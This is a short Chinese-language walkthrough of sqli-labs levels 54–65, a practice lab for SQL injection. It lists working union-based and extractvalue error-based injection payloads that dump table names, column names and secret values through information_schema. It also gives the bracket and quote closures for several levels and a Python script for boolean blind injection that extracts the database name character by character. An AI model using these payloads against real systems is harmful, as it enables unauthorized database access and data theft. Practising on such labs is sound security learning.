sqli-labs刷题(54-65)
54 无报错 无过滤 union
ID:1
ID:1'
ID:1'--
ID:0' union select 1,2,3--
ID:0' union select 1,2,database()--
ID:0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--
ID:0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ildvytwz6d'--
ID:0' union select 1,2,secret_54Z4 from ildvytwz6d--
55
ID:1
ID:1'
ID:1'--
ID:1')--
ID:1")--
ID:1)--
ID:0) union select 1,2,3--
ID:0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--
ID:0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='evu5o2kvg8'--
ID:0) union select 1,2,secret_ZIST from evu5o2kvg8--
56
')
57
"
58 报错
ID:1'
ID:1' and extractvalue(1,concat(0x7e,(select user())))--
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--
ID:1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='97g4e9dy69')))--
ID:1' and extractvalue(1,concat(0x7e,(select secret_KZUH from 97g4e9dy69)))--
59
无闭合报错
60
")
闭合报错
61
'))
闭合报错
各个闭合方式的布尔盲注
62
脚本模板
import requests
url0="http://sql.test/Less-62/?id=1') and "
databasename=''#这里我提前手工查到了databasename的长度为10,用length()
for i in range(1,10):
min = 33
max = 127
while(abs(min-max)>1):
mid = (min + max)//2
url = url0 + "(ascii((mid(database(),{},1)))>{})--+".format(i,mid)
print(url)
req = requests.get(url=url)
if ("Angelina" in req.text):
min = mid
else:
max = mid
# print(abs(min-max))
databasename+=chr(max)
print(databasename)
63 单引号闭合
'
64 双括号
))
65 单括号
)